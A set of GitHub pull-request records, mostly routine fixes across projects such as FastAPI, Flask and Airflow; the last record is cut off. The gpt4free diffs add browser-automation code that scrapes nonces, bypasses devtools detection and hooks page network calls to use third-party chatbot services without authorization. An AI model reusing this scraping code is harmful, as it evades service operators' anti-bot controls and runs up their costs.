@@ -37,6 +37,8 @@ def get_model_definitions(
)
definitions.update(m_definitions)
model_name = model_name_map[model]
+ if "description" in m_schema:
+ m_schema["description"] = m_schema["description"].split("\f")[0]
definitions[model_name] = m_schema
return definitions
| ## Problem
Currently, on FastAPI endpoint functions we can write documentation both for the OpenAPI description/Swagger and for internal Python purposes:
```python
from fastapi import FastAPI
from pydantic import BaseModel
app = FastAPI()
@app.get("/")
def useful():
"""My description.
\f
Internal documentation.
"""
...
```
On Swagger we'll have:
![image](https://user-images.githubusercontent.com/7353520/113333626-f3008200-9322-11eb-9f9c-ca6ba5782d25.png)
When documenting models, it doesn't have the same behavior:
```python
from enum import Enum
from fastapi import FastAPI
class Banana(str, Enum):
"""My description.
\f
Internal documentation.
"""
HAHA = "haha"
HOHO = "hoho"
app = FastAPI()
@app.get("/")
def useful(banana: Banana):
...
```
On Swagger, we'll have:
![image](https://user-images.githubusercontent.com/7353520/113333882-48d52a00-9323-11eb-8d0e-eef8cc965d04.png)
## Solution
The proposed _two lines of code_ in this PR make it possible to have the same behavior as the endpoint description:
![image](https://user-images.githubusercontent.com/7353520/113334003-6e623380-9323-11eb-849d-750a85f7847c.png)
It follows the same idea as: https://github.com/tiangolo/fastapi/blob/10397ddc30ef9bb26e9247f04fe20ce3045081c4/fastapi/routing.py#L350
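The mechanism is a plain form-feed split, for example:
```python
description = "My description.\n\f\nInternal documentation."

# Only the part before the \f form feed ends up in the generated OpenAPI schema.
assert description.split("\f")[0] == "My description.\n"
```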
## Related issues
- https://github.com/tiangolo/fastapi/issues/3024
## Questions & Alternatives
- Should Pydantic handle this on the [model_process_schema()](https://github.com/samuelcolvin/pydantic/blob/e68c277afe6bf6e7966bfecfe9b228d33f2de44b/pydantic/schema.py#L519) function instead? | https://api.github.com/repos/tiangolo/fastapi/pulls/3032 | 2021-04-01T17:51:57Z | 2022-09-02T12:43:22Z | 2022-09-02T12:43:22Z | 2022-09-02T13:22:35Z | 125 | tiangolo/fastapi | 22,833 |
base WS - fix headers | diff --git a/php/pro/Client.php b/php/pro/Client.php
index 90ed16d4cac0..7af211f45c06 100644
--- a/php/pro/Client.php
+++ b/php/pro/Client.php
@@ -142,7 +142,8 @@ public function create_connection() {
if ($this->verbose) {
echo date('c'), ' connecting to ', $this->url, "\n";
}
- $promise = call_user_func($this->connector, $this->url);
+ $headers = property_exists($this, 'options') && array_key_exists('headers', $this->options) ? $this->options['headers'] : [];
+ $promise = call_user_func($this->connector, $this->url, [], $headers);
Timer\timeout($promise, $timeout, Loop::get())->then(
function($connection) {
if ($this->verbose) {
| fix #15665
Eventually I was able to find the reason for that issue in the WS base files - they were not setting $headers at all, so the header options set inside `describe` were just ignored.
| https://api.github.com/repos/ccxt/ccxt/pulls/15719 | 2022-11-17T07:28:24Z | 2022-11-17T09:34:34Z | 2022-11-17T09:34:34Z | 2022-11-17T10:55:55Z | 203 | ccxt/ccxt | 13,434 |
Add release notes for 1.0.6 | diff --git a/docs/news.rst b/docs/news.rst
index 3e60b2b4f8c..8dd3261c942 100644
--- a/docs/news.rst
+++ b/docs/news.rst
@@ -3,6 +3,14 @@
Release notes
=============
+1.0.6 (2016-05-04)
+------------------
+
+- FIX: RetryMiddleware is now robust to non-standard HTTP status codes (:issue:`1857`)
+- FIX: Filestorage HTTP cache was checking wrong modified time (:issue:`1875`)
+- DOC: Support for Sphinx 1.4+ (:issue:`1893`)
+- DOC: Consistency in selectors examples (:issue:`1869`)
+
1.0.5 (2016-02-04)
------------------
| https://api.github.com/repos/scrapy/scrapy/pulls/1966 | 2016-05-04T14:13:30Z | 2016-05-04T14:27:29Z | 2016-05-04T14:27:29Z | 2016-05-17T15:55:25Z | 173 | scrapy/scrapy | 34,998 |
|
add SwiftLearner | diff --git a/README.md b/README.md
index 306feff9..8353b0e0 100644
--- a/README.md
+++ b/README.md
@@ -1149,6 +1149,7 @@ on MNIST digits[DEEP LEARNING]
* [FlinkML in Apache Flink](https://ci.apache.org/projects/flink/flink-docs-master/apis/batch/libs/ml/index.html) - Distributed machine learning library in Flink
* [DynaML](https://github.com/mandar2812/DynaML) - Scala Library/REPL for Machine Learning Research
* [Saul](https://github.com/IllinoisCogComp/saul/) - Flexible Declarative Learning-Based Programming.
+* [SwiftLearner](https://github.com/valdanylchuk/swiftlearner/) - Simply written algorithms to help study ML or write your own implementations.
<a name="swift" />
## Swift
| https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/304 | 2016-08-22T22:56:13Z | 2016-08-23T20:49:03Z | 2016-08-23T20:49:03Z | 2016-08-23T20:49:06Z | 207 | josephmisiti/awesome-machine-learning | 52,213 |
|
Fix Chatgpt4Online Provider | diff --git a/g4f/Provider/AiAsk.py b/g4f/Provider/AiAsk.py
index ac123fc98f..094ef07675 100644
--- a/g4f/Provider/AiAsk.py
+++ b/g4f/Provider/AiAsk.py
@@ -8,7 +8,7 @@ class AiAsk(AsyncGeneratorProvider):
url = "https://e.aiask.me"
supports_message_history = True
supports_gpt_35_turbo = True
- working = True
+ working = False
@classmethod
async def create_async_generator(
diff --git a/g4f/Provider/Aichat.py b/g4f/Provider/Aichat.py
index 77ae44291a..41ea9a96f4 100644
--- a/g4f/Provider/Aichat.py
+++ b/g4f/Provider/Aichat.py
@@ -8,8 +8,8 @@
from ..requests import StreamSession
class Aichat(AsyncProvider):
- url = "https://chat-gpt.org/chat"
- working = True
+ url = "https://chat-gpt.org/chat"
+ working = False
supports_gpt_35_turbo = True
@staticmethod
diff --git a/g4f/Provider/Chatgpt4Online.py b/g4f/Provider/Chatgpt4Online.py
index d75096392f..57ab948253 100644
--- a/g4f/Provider/Chatgpt4Online.py
+++ b/g4f/Provider/Chatgpt4Online.py
@@ -1,42 +1,44 @@
from __future__ import annotations
-import json
+import re
from aiohttp import ClientSession
-from ..typing import AsyncResult, Messages
-from .base_provider import AsyncGeneratorProvider
+from ..typing import Messages
+from .base_provider import AsyncProvider
+from .helper import format_prompt
-
-class Chatgpt4Online(AsyncGeneratorProvider):
+class Chatgpt4Online(AsyncProvider):
url = "https://chatgpt4online.org"
supports_message_history = True
supports_gpt_35_turbo = True
- working = False
+ working = True
+ _wpnonce = None
@classmethod
- async def create_async_generator(
+ async def create_async(
cls,
model: str,
messages: Messages,
proxy: str = None,
**kwargs
- ) -> AsyncResult:
+ ) -> str:
async with ClientSession() as session:
+ if not cls._wpnonce:
+ async with session.get(f"{cls.url}/", proxy=proxy) as response:
+ response.raise_for_status()
+ response = await response.text()
+ if result := re.search(r'data-nonce="(.*?)"', response):
+ cls._wpnonce = result.group(1)
+ else:
+ raise RuntimeError("No nonce found")
data = {
- "botId": "default",
- "customId": None,
- "session": "N/A",
- "chatId": "",
- "contextId": 58,
- "messages": messages,
- "newMessage": messages[-1]["content"],
- "stream": True
+ "_wpnonce": cls._wpnonce,
+ "post_id": 58,
+ "url": "https://chatgpt4online.org",
+ "action": "wpaicg_chat_shortcode_message",
+ "message": format_prompt(messages),
+ "bot_id": 3405
}
-
- async with session.post(f"{cls.url}/wp-json/mwai-ui/v1/chats/submit", json=data, proxy=proxy) as response:
+ async with session.post(f"{cls.url}/rizq", data=data, proxy=proxy) as response:
response.raise_for_status()
- async for line in response.content:
- if line.startswith(b"data: "):
- line = json.loads(line[6:])
- if line["type"] == "live":
- yield line["data"]
\ No newline at end of file
+ return (await response.json())["data"]
\ No newline at end of file
diff --git a/g4f/Provider/FreeGpt.py b/g4f/Provider/FreeGpt.py
index a3a26fe657..22c6c9aa43 100644
--- a/g4f/Provider/FreeGpt.py
+++ b/g4f/Provider/FreeGpt.py
@@ -12,7 +12,7 @@
class FreeGpt(AsyncGeneratorProvider):
url = "https://freegpts1.aifree.site/"
- working = True
+ working = False
supports_message_history = True
supports_gpt_35_turbo = True
diff --git a/g4f/Provider/__init__.py b/g4f/Provider/__init__.py
index a72db45c4c..70ad9de72b 100644
--- a/g4f/Provider/__init__.py
+++ b/g4f/Provider/__init__.py
@@ -1,9 +1,6 @@
from __future__ import annotations
-from .Acytoo import Acytoo
from .AiAsk import AiAsk
-from .Aibn import Aibn
from .Aichat import Aichat
-from .Ails import Ails
from .AItianhu import AItianhu
from .AItianhuSpace import AItianhuSpace
from .Berlin import Berlin
@@ -13,11 +10,9 @@
from .Chatgpt4Online import Chatgpt4Online
from .ChatgptAi import ChatgptAi
from .ChatgptDemo import ChatgptDemo
-from .ChatgptDuo import ChatgptDuo
from .ChatgptFree import ChatgptFree
from .ChatgptLogin import ChatgptLogin
from .ChatgptX import ChatgptX
-from .Cromicle import Cromicle
from .DeepInfra import DeepInfra
from .FakeGpt import FakeGpt
from .FreeGpt import FreeGpt
diff --git a/g4f/Provider/Acytoo.py b/g4f/Provider/deprecated/Acytoo.py
similarity index 92%
rename from g4f/Provider/Acytoo.py
rename to g4f/Provider/deprecated/Acytoo.py
index 4dee176a77..0379fdd653 100644
--- a/g4f/Provider/Acytoo.py
+++ b/g4f/Provider/deprecated/Acytoo.py
@@ -2,8 +2,8 @@
from aiohttp import ClientSession
-from ..typing import AsyncResult, Messages
-from .base_provider import AsyncGeneratorProvider
+from ...typing import AsyncResult, Messages
+from ..base_provider import AsyncGeneratorProvider
class Acytoo(AsyncGeneratorProvider):
diff --git a/g4f/Provider/Aibn.py b/g4f/Provider/deprecated/Aibn.py
similarity index 89%
rename from g4f/Provider/Aibn.py
rename to g4f/Provider/deprecated/Aibn.py
index 1f81a61e25..60cef1e48c 100644
--- a/g4f/Provider/Aibn.py
+++ b/g4f/Provider/deprecated/Aibn.py
@@ -3,9 +3,9 @@
import time
import hashlib
-from ..typing import AsyncResult, Messages
-from ..requests import StreamSession
-from .base_provider import AsyncGeneratorProvider
+from ...typing import AsyncResult, Messages
+from ...requests import StreamSession
+from ..base_provider import AsyncGeneratorProvider
class Aibn(AsyncGeneratorProvider):
diff --git a/g4f/Provider/Ails.py b/g4f/Provider/deprecated/Ails.py
similarity index 96%
rename from g4f/Provider/Ails.py
rename to g4f/Provider/deprecated/Ails.py
index 58010756c3..93c63a6937 100644
--- a/g4f/Provider/Ails.py
+++ b/g4f/Provider/deprecated/Ails.py
@@ -7,8 +7,8 @@
from datetime import datetime
from aiohttp import ClientSession
-from ..typing import SHA256, AsyncResult, Messages
-from .base_provider import AsyncGeneratorProvider
+from ...typing import SHA256, AsyncResult, Messages
+from ..base_provider import AsyncGeneratorProvider
class Ails(AsyncGeneratorProvider):
diff --git a/g4f/Provider/ChatgptDuo.py b/g4f/Provider/deprecated/ChatgptDuo.py
similarity index 94%
rename from g4f/Provider/ChatgptDuo.py
rename to g4f/Provider/deprecated/ChatgptDuo.py
index fef3f85679..c77c6a1c6b 100644
--- a/g4f/Provider/ChatgptDuo.py
+++ b/g4f/Provider/deprecated/ChatgptDuo.py
@@ -1,8 +1,8 @@
from __future__ import annotations
-from ..typing import Messages
+from ...typing import Messages
from curl_cffi.requests import AsyncSession
-from .base_provider import AsyncProvider, format_prompt
+from ..base_provider import AsyncProvider, format_prompt
class ChatgptDuo(AsyncProvider):
diff --git a/g4f/Provider/Cromicle.py b/g4f/Provider/deprecated/Cromicle.py
similarity index 89%
rename from g4f/Provider/Cromicle.py
rename to g4f/Provider/deprecated/Cromicle.py
index 8deb79c1a3..9f986cb51a 100644
--- a/g4f/Provider/Cromicle.py
+++ b/g4f/Provider/deprecated/Cromicle.py
@@ -2,10 +2,10 @@
from aiohttp import ClientSession
from hashlib import sha256
-from ..typing import AsyncResult, Messages, Dict
+from ...typing import AsyncResult, Messages, Dict
-from .base_provider import AsyncGeneratorProvider
-from .helper import format_prompt
+from ..base_provider import AsyncGeneratorProvider
+from ..helper import format_prompt
class Cromicle(AsyncGeneratorProvider):
diff --git a/g4f/Provider/deprecated/__init__.py b/g4f/Provider/deprecated/__init__.py
index f8e35b37c8..ca5ac83e11 100644
--- a/g4f/Provider/deprecated/__init__.py
+++ b/g4f/Provider/deprecated/__init__.py
@@ -13,4 +13,9 @@
from .Aivvm import Aivvm
from .Vitalentum import Vitalentum
from .H2o import H2o
-from .Myshell import Myshell
\ No newline at end of file
+from .Myshell import Myshell
+from .Acytoo import Acytoo
+from .Aibn import Aibn
+from .Ails import Ails
+from .ChatgptDuo import ChatgptDuo
+from .Cromicle import Cromicle
\ No newline at end of file
diff --git a/g4f/models.py b/g4f/models.py
index 0ce7b88673..cdca0e3fa2 100644
--- a/g4f/models.py
+++ b/g4f/models.py
@@ -15,10 +15,8 @@
Berlin,
Llama2,
Vercel,
- Aichat,
GPTalk,
Koala,
- AiAsk,
GptGo,
Phind,
Bard,
@@ -42,7 +40,7 @@ def __all__() -> list[str]:
base_provider = "",
best_provider = RetryProvider([
Bing, # Not fully GPT 3 or 4
- AiAsk, Aichat, ChatgptAi, FreeGpt, GptGo, GeekGpt,
+ ChatgptAi, GptGo, GeekGpt,
Phind, You
])
)
| https://api.github.com/repos/xtekky/gpt4free/pulls/1247 | 2023-11-13T17:59:10Z | 2023-11-15T17:25:28Z | 2023-11-15T17:25:28Z | 2023-11-15T17:25:28Z | 2,727 | xtekky/gpt4free | 38,254 |
|
Add Poe Provider, Update AItianhuSpace Provider |
index d316fc6fd0..a9a824cf5b 100644
--- a/g4f/Provider/AItianhuSpace.py
+++ b/g4f/Provider/AItianhuSpace.py
@@ -1,95 +1,128 @@
from __future__ import annotations
-import random, json
-from .. import debug
-from ..typing import AsyncResult, Messages
-from ..requests import StreamSession
-from .base_provider import AsyncGeneratorProvider, format_prompt, get_cookies
+import time
+import random
-domains = {
- "gpt-3.5-turbo": "aitianhu.space",
- "gpt-4": "aitianhu.website",
-}
+from ..typing import CreateResult, Messages
+from .base_provider import BaseProvider
+from .helper import WebDriver, format_prompt, get_browser
+from .. import debug
-class AItianhuSpace(AsyncGeneratorProvider):
+class AItianhuSpace(BaseProvider):
url = "https://chat3.aiyunos.top/"
working = True
supports_gpt_35_turbo = True
+ _domains = ["aitianhu.com", "aitianhu1.top"]
@classmethod
- async def create_async_generator(cls,
- model: str,
- messages: Messages,
- proxy: str = None,
- domain: str = None,
- cookies: dict = None,
- timeout: int = 10, **kwargs) -> AsyncResult:
-
+ def create_completion(
+ cls,
+ model: str,
+ messages: Messages,
+ stream: bool,
+ domain: str = None,
+ proxy: str = None,
+ timeout: int = 120,
+ browser: WebDriver = None,
+ hidden_display: bool = True,
+ **kwargs
+ ) -> CreateResult:
if not model:
model = "gpt-3.5-turbo"
-
- elif model not in domains:
- raise ValueError(f"Model are not supported: {model}")
-
if not domain:
chars = 'abcdefghijklmnopqrstuvwxyz0123456789'
rand = ''.join(random.choice(chars) for _ in range(6))
- domain = f"{rand}.{domains[model]}"
-
+ domain = random.choice(cls._domains)
+ domain = f"{rand}.{domain}"
if debug.logging:
print(f"AItianhuSpace | using domain: {domain}")
+ url = f"https://{domain}"
+ prompt = format_prompt(messages)
+ if browser:
+ driver = browser
+ else:
+ if hidden_display:
+ driver, display = get_browser("", True, proxy)
+ else:
+ driver = get_browser("", False, proxy)
- if not cookies:
- cookies = get_cookies('.aitianhu.space')
- if not cookies:
- raise RuntimeError(f"g4f.provider.{cls.__name__} requires cookies [refresh https://{domain} on chrome]")
+ from selenium.webdriver.common.by import By
+ from selenium.webdriver.support.ui import WebDriverWait
+ from selenium.webdriver.support import expected_conditions as EC
- url = f'https://{domain}'
- async with StreamSession(proxies={"https": proxy},
- cookies=cookies, timeout=timeout, impersonate="chrome110", verify=False) as session:
-
- data = {
- "prompt": format_prompt(messages),
- "options": {},
- "systemMessage": "You are ChatGPT, a large language model trained by OpenAI. Follow the user's instructions carefully.",
- "temperature": 0.8,
- "top_p": 1,
- **kwargs
- }
- headers = {
- "Authority": url,
- "Accept": "application/json, text/plain, */*",
- "Origin": url,
- "Referer": f"{url}/"
- }
- async with session.post(f"{url}/api/chat-process", json=data, headers=headers) as response:
- response.raise_for_status()
- async for line in response.iter_lines():
- if line == b"<script>":
- raise RuntimeError("Solve challenge and pass cookies and a fixed domain")
- if b"platform's risk control" in line:
- raise RuntimeError("Platform's Risk Control")
- line = json.loads(line)
- if "detail" in line:
- if content := line["detail"]["choices"][0]["delta"].get(
- "content"
- ):
- yield content
- elif "message" in line and "AI-4接口非常昂贵" in line["message"]:
- raise RuntimeError("Rate limit for GPT 4 reached")
- else:
- raise RuntimeError(f"Response: {line}")
-
+ wait = WebDriverWait(driver, timeout)
- @classmethod
- @property
- def params(cls):
- params = [
- ("model", "str"),
- ("messages", "list[dict[str, str]]"),
- ("stream", "bool"),
- ("temperature", "float"),
- ("top_p", "int"),
- ]
- param = ", ".join([": ".join(p) for p in params])
- return f"g4f.provider.{cls.__name__} supports: ({param})"
+ # Bypass devtools detection
+ driver.get("https://blank.page/")
+ wait.until(EC.visibility_of_element_located((By.ID, "sheet")))
+ driver.execute_script(f"""
+document.getElementById('sheet').addEventListener('click', () => {{
+ window.open('{url}', '_blank');
+}});
+""")
+ driver.find_element(By.ID, "sheet").click()
+ time.sleep(10)
+
+ original_window = driver.current_window_handle
+ for window_handle in driver.window_handles:
+ if window_handle != original_window:
+ driver.switch_to.window(window_handle)
+ break
+
+ wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, "textarea.n-input__textarea-el")))
+
+ try:
+ # Add hook in XMLHttpRequest
+ script = """
+const _http_request_open = XMLHttpRequest.prototype.open;
+window._last_message = window._message = "";
+window._loadend = false;
+XMLHttpRequest.prototype.open = function(method, url) {
+ if (url == "/api/chat-process") {
+ this.addEventListener("progress", (event) => {
+ const lines = this.responseText.split("\\n");
+ try {
+ window._message = JSON.parse(lines[lines.length-1])["text"];
+ } catch(e) { }
+ });
+ this.addEventListener("loadend", (event) => {
+ window._loadend = true;
+ });
+ }
+ return _http_request_open.call(this, method, url);
+}
+"""
+ driver.execute_script(script)
+
+ # Input and submit prompt
+ driver.find_element(By.CSS_SELECTOR, "textarea.n-input__textarea-el").send_keys(prompt)
+ driver.find_element(By.CSS_SELECTOR, "button.n-button.n-button--primary-type.n-button--medium-type").click()
+
+ # Yield response
+ while True:
+ chunk = driver.execute_script("""
+if (window._message && window._message != window._last_message) {
+ try {
+ return window._message.substring(window._last_message.length);
+ } finally {
+ window._last_message = window._message;
+ }
+}
+if (window._loadend) {
+ return null;
+}
+return "";
+""")
+ if chunk:
+ yield chunk
+ elif chunk != "":
+ break
+ else:
+ time.sleep(0.1)
+ finally:
+ driver.close()
+ if not browser:
+ time.sleep(0.1)
+ driver.quit()
+ if hidden_display:
+ display.stop()
\ No newline at end of file
diff --git a/g4f/Provider/MyShell.py b/g4f/Provider/MyShell.py
index 70fd35091d..0efeb0e828 100644
--- a/g4f/Provider/MyShell.py
+++ b/g4f/Provider/MyShell.py
@@ -38,11 +38,11 @@ def create_completion(
driver.get(cls.url)
try:
- # Wait for page load
+ # Wait for page load and cloudflare validation
WebDriverWait(driver, timeout).until(
EC.presence_of_element_located((By.CSS_SELECTOR, "body:not(.no-js)"))
)
- # Send message
+ # Send request with message
script = """
response = await fetch("https://api.myshell.ai/v1/bot/chat/send_message", {
"headers": {
@@ -66,7 +66,7 @@ def create_completion(
script = """
chunk = await window.reader.read();
if (chunk['done']) return null;
-text = (new TextDecoder ()).decode(chunk['value']);
+text = (new TextDecoder()).decode(chunk['value']);
content = '';
text.split('\\n').forEach((line, index) => {
if (line.startsWith('data: ')) {
@@ -81,7 +81,7 @@ def create_completion(
return content;
"""
while True:
- chunk = driver.execute_script(script):
+ chunk = driver.execute_script(script)
if chunk:
yield chunk
elif chunk != "":
diff --git a/g4f/Provider/helper.py b/g4f/Provider/helper.py
index cad32f053e..b10c912af6 100644
--- a/g4f/Provider/helper.py
+++ b/g4f/Provider/helper.py
@@ -18,10 +18,10 @@
BrowserCookieError
)
try:
- from selenium.webdriver.remote.webdriver import WebDriver
- except ImportError:
- class WebDriver():
- pass
+ from selenium.webdriver.remote.webdriver import WebDriver
+except ImportError:
+ class WebDriver():
+ pass
try:
from undetected_chromedriver import Chrome, ChromeOptions
except ImportError:
@@ -153,7 +153,7 @@ def get_browser(
if proxy:
if not options:
options = ChromeOptions()
- options.add_argument(f'--proxy-server={proxy}')
+ options.add_argument(f'--proxy-server={proxy}')
browser = Chrome(user_data_dir=user_data_dir, options=options)
if hidden_display:
diff --git a/g4f/Provider/needs_auth/Poe.py b/g4f/Provider/needs_auth/Poe.py
new file mode 100644
index 0000000000..6fbf7fd4ec
--- /dev/null
+++ b/g4f/Provider/needs_auth/Poe.py
@@ -0,0 +1,129 @@
+from __future__ import annotations
+
+import time
+
+from ...typing import CreateResult, Messages
+from ..base_provider import BaseProvider
+from ..helper import WebDriver, format_prompt, get_browser
+
+models = {
+ "meta-llama/Llama-2-7b-chat-hf": {"name": "Llama-2-7b"},
+ "meta-llama/Llama-2-13b-chat-hf": {"name": "Llama-2-13b"},
+ "meta-llama/Llama-2-70b-chat-hf": {"name": "Llama-2-70b"},
+ "codellama/CodeLlama-7b-Instruct-hf": {"name": "Code-Llama-7b"},
+ "codellama/CodeLlama-13b-Instruct-hf": {"name": "Code-Llama-13b"},
+ "codellama/CodeLlama-34b-Instruct-hf": {"name": "Code-Llama-34b"},
+ "gpt-3.5-turbo": {"name": "GPT-3.5-Turbo"},
+ "gpt-3.5-turbo-instruct": {"name": "GPT-3.5-Turbo-Instruct"},
+ "gpt-4": {"name": "GPT-4"},
+ "palm": {"name": "Google-PaLM"},
+}
+
+class Poe(BaseProvider):
+ url = "https://poe.com"
+ working = True
+ supports_gpt_35_turbo = True
+ supports_stream = True
+
+ @classmethod
+ def create_completion(
+ cls,
+ model: str,
+ messages: Messages,
+ stream: bool,
+ proxy: str = None,
+ browser: WebDriver = None,
+ hidden_display: bool = True,
+ **kwargs
+ ) -> CreateResult:
+ if not model:
+ model = "gpt-3.5-turbo"
+ elif model not in models:
+ raise ValueError(f"Model are not supported: {model}")
+ prompt = format_prompt(messages)
+ if browser:
+ driver = browser
+ else:
+ if hidden_display:
+ driver, display = get_browser(None, True, proxy)
+ else:
+ driver = get_browser(None, False, proxy)
+
+ script = """
+window._message = window._last_message = "";
+window._message_finished = false;
+class ProxiedWebSocket extends WebSocket {
+ constructor(url, options) {
+ super(url, options);
+ this.addEventListener("message", (e) => {
+ const data = JSON.parse(JSON.parse(e.data)["messages"][0])["payload"]["data"];
+ if ("messageAdded" in data) {
+ if (data["messageAdded"]["author"] != "human") {
+ window._message = data["messageAdded"]["text"];
+ if (data["messageAdded"]["state"] == "complete") {
+ window._message_finished = true;
+ }
+ }
+ }
+ });
+ }
+}
+window.WebSocket = ProxiedWebSocket;
+"""
+ driver.execute_cdp_cmd("Page.addScriptToEvaluateOnNewDocument", {
+ "source": script
+ })
+
+ from selenium.webdriver.common.by import By
+ from selenium.webdriver.support.ui import WebDriverWait
+ from selenium.webdriver.support import expected_conditions as EC
+
+ try:
+ driver.get(f"{cls.url}/{models[model]['name']}")
+ wait = WebDriverWait(driver, 10 if hidden_display else 240)
+ wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, "textarea[class^='GrowingTextArea']")))
+ except:
+ # Reopen browser for login
+ if not browser:
+ driver.quit()
+ if hidden_display:
+ display.stop()
+ driver = get_browser(None, False, proxy)
+ driver.get(f"{cls.url}/{models[model]['name']}")
+ wait = WebDriverWait(driver, 240)
+ wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, "textarea[class^='GrowingTextArea']")))
+ else:
+ raise RuntimeError("Prompt textarea not found. You may not be logged in.")
+
+ driver.find_element(By.CSS_SELECTOR, "footer textarea[class^='GrowingTextArea']").send_keys(prompt)
+ driver.find_element(By.CSS_SELECTOR, "footer button[class*='ChatMessageSendButton']").click()
+
+ try:
+ script = """
+if(window._message && window._message != window._last_message) {
+ try {
+ return window._message.substring(window._last_message.length);
+ } finally {
+ window._last_message = window._message;
+ }
+} else if(window._message_finished) {
+ return null;
+} else {
+ return '';
+}
+"""
+ while True:
+ chunk = driver.execute_script(script)
+ if chunk:
+ yield chunk
+ elif chunk != "":
+ break
+ else:
+ time.sleep(0.1)
+ finally:
+ driver.close()
+ if not browser:
+ time.sleep(0.1)
+ driver.quit()
+ if hidden_display:
+ display.stop()
\ No newline at end of file
diff --git a/g4f/Provider/needs_auth/__init__.py b/g4f/Provider/needs_auth/__init__.py
index 815194c4c7..4230253ea1 100644
--- a/g4f/Provider/needs_auth/__init__.py
+++ b/g4f/Provider/needs_auth/__init__.py
@@ -3,4 +3,5 @@
from .Theb import Theb
from .HuggingChat import HuggingChat
from .OpenaiChat import OpenaiChat
-from .OpenAssistant import OpenAssistant
\ No newline at end of file
+from .OpenAssistant import OpenAssistant
+from .Poe import Poe
\ No newline at end of file
| https://api.github.com/repos/xtekky/gpt4free/pulls/1261 | 2023-11-17T02:19:47Z | 2023-11-17T02:21:51Z | 2023-11-17T02:21:50Z | 2023-11-17T02:21:51Z | 3,730 | xtekky/gpt4free | 38,170 |
|
Use print() function in both Python 2 and Python 3 | diff --git a/Web Sockets/Files/ws-harness.py b/Web Sockets/Files/ws-harness.py
index 7e3a2f633c..1fea6ecafb 100644
--- a/Web Sockets/Files/ws-harness.py
+++ b/Web Sockets/Files/ws-harness.py
@@ -1,4 +1,5 @@
#!/usr/bin/python
+from __future__ import print_function
import socket,ssl
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from websocket import create_connection, WebSocket
@@ -9,7 +10,7 @@
LOOP_BACK_PORT_NUMBER = 8000
def FuzzWebSocket(fuzz_value):
- print fuzz_value
+ print(fuzz_value)
ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
result = ws.recv()
return result
@@ -22,7 +23,7 @@ def LoadMessage(file):
file_contents = f.read()
f.close()
except:
- print ("Error reading file: %s" % file)
+ print("Error reading file: %s" % file)
exit()
return file_contents
@@ -52,12 +53,12 @@ def do_GET(self):
#Create a web server and define the handler to manage the
#incoming request
server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
- print 'Started httpserver on port ' , LOOP_BACK_PORT_NUMBER
+ print('Started httpserver on port ' , LOOP_BACK_PORT_NUMBER)
#Wait forever for incoming http requests
server.serve_forever()
except KeyboardInterrupt:
- print '^C received, shutting down the web server'
+ print('^C received, shutting down the web server')
server.socket.close()
- ws.close()
\ No newline at end of file
+ ws.close()
| Legacy __print__ statements are syntax errors in Python 3 but __print()__ function works as expected in both Python 2 and Python 3. | https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/66 | 2019-04-26T18:35:24Z | 2019-04-26T23:02:09Z | 2019-04-26T23:02:09Z | 2019-04-26T23:50:18Z | 404 | swisskyrepo/PayloadsAllTheThings | 8,479 |
Update docstring for errorhandler() | diff --git a/flask/app.py b/flask/app.py
index 59c77a1587..68de2b904b 100644
--- a/flask/app.py
+++ b/flask/app.py
@@ -1153,7 +1153,8 @@ def page_not_found(error):
that do not necessarily have to be a subclass of the
:class:`~werkzeug.exceptions.HTTPException` class.
- :param code: the code as integer for the handler
+ :param code_or_exception: the code as integer for the handler, or
+ an arbitrary exception
"""
def decorator(f):
self._register_error_handler(None, code_or_exception, f)
| update the `:param` definition for the `errorhandler()` decorator in `app.py`. | https://api.github.com/repos/pallets/flask/pulls/2070 | 2016-10-31T15:27:31Z | 2016-10-31T16:41:38Z | 2016-10-31T16:41:38Z | 2020-11-14T04:33:09Z | 151 | pallets/flask | 20,828 |
Don't add license headers for files in "node_modules" and "cypress" folders | diff --git a/scripts/add_license_headers.py b/scripts/add_license_headers.py
index 329f0ac4b7ca..ad4679aa627f 100755
--- a/scripts/add_license_headers.py
+++ b/scripts/add_license_headers.py
@@ -35,6 +35,8 @@
"/gen/",
"/static/",
"/vendor/",
+ "/node_modules/",
+ "/cypress/",
"/react-app-env.d.ts",
"/css/variables.scss", # scss-to-json doesn't like our normal header.
]
| Added `node_modules` and `cypress` folders to `EXCLUDE_PATTERNS`. | https://api.github.com/repos/streamlit/streamlit/pulls/2655 | 2021-01-25T10:06:03Z | 2021-01-25T19:12:44Z | 2021-01-25T19:12:44Z | 2021-07-24T00:37:01Z | 117 | streamlit/streamlit | 21,671 |
fix:const.py add CONFIG_ROOT | diff --git a/metagpt/const.py b/metagpt/const.py
index a57be641b..828fb2f05 100644
--- a/metagpt/const.py
+++ b/metagpt/const.py
@@ -47,7 +47,7 @@ def get_metagpt_root():
# METAGPT PROJECT ROOT AND VARS
-
+CONFIG_ROOT = Path.home() / ".metagpt"
METAGPT_ROOT = get_metagpt_root() # Dependent on METAGPT_PROJECT_ROOT
DEFAULT_WORKSPACE_ROOT = METAGPT_ROOT / "workspace"
| **Features**
<!-- Clear and direct description of the submit features. -->
<!-- If it's a bug fix, please also paste the issue link. -->
- xx
- yy
**Feature Docs**
<!-- The RFC, tutorial, or use cases about the feature if it's a pretty big update. If not, there is no need to fill. -->
**Influence**
<!-- Tell me the impact of the new feature and I'll focus on it. -->
**Result**
<!-- The screenshot/log of unittest/running result -->
**Other**
<!-- Something else about this PR. --> | https://api.github.com/repos/geekan/MetaGPT/pulls/1157 | 2024-04-03T02:32:35Z | 2024-04-03T02:36:58Z | 2024-04-03T02:36:58Z | 2024-04-03T02:36:58Z | 131 | geekan/MetaGPT | 16,665 |
[AIRFLOW-6238] Filter dags returned by dag_stats | diff --git a/airflow/www/templates/airflow/dags.html b/airflow/www/templates/airflow/dags.html
index a356b8dff2b68..57ba2607b3848 100644
--- a/airflow/www/templates/airflow/dags.html
+++ b/airflow/www/templates/airflow/dags.html
@@ -328,7 +328,7 @@ <h2>DAGs</h2>
}
d3.selectAll(".loading-last-run").remove();
});
- d3.json("{{ url_for('Airflow.dag_stats') }}", function(error, json) {
+ d3.json("{{ url_for('Airflow.dag_stats') }}?dag_ids=" + (encoded_dag_ids.join(',')), function(error, json) {
for(var dag_id in json) {
